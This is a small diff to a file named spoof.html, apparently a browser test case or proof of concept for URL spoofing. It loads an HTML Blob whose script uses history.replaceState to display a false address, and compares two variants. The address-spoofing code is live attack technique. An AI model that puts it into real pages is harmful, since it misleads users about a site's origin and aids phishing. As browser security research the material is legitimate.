--- a/spoof.html
+++ b/spoof.html
@@ -1,4 +1,9 @@
+<!-- <script>
+var exp = 'Sergey (1) <script>history.replaceState("","","foo-bar.html")<\/script>';
+location=URL.createObjectURL(new Blob([exp], {type: "text/html"}))
+</script> -->
+
 <script>
-var exp = 'Sergey <script>history.replaceState("","","foo-bar.html")<\/script>';
+var exp = 'Sergey (2) <script>history.replaceState("","","http://foo-bar.html")<\/script>';
 location=URL.createObjectURL(new Blob([exp], {type: "text/html"}))
 </script>
